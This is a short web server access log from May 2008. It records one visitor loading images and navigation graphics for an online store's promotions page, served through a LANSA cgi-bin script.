68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/spacer.gif HTTP/1.1" 200 55 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/login.gif HTTP/1.1" 200 166 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/search.gif HTTP/1.1" 200 614 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/sale_promo-icon.gif HTTP/1.1" 200 402 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/items/CONFORM_THUMB.JPG HTTP/1.1" 200 1623 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/nav_upper_bgrd.jpg HTTP/1.1" 200 2954 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /images/nav_lower_bgrd.jpg HTTP/1.1" 200 2321 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:19 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
68.228.67.155 - - [20/May/2008:03:03:25 -0400] "GET /images/nav04_about_over.jpg HTTP/1.1" 200 1472 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
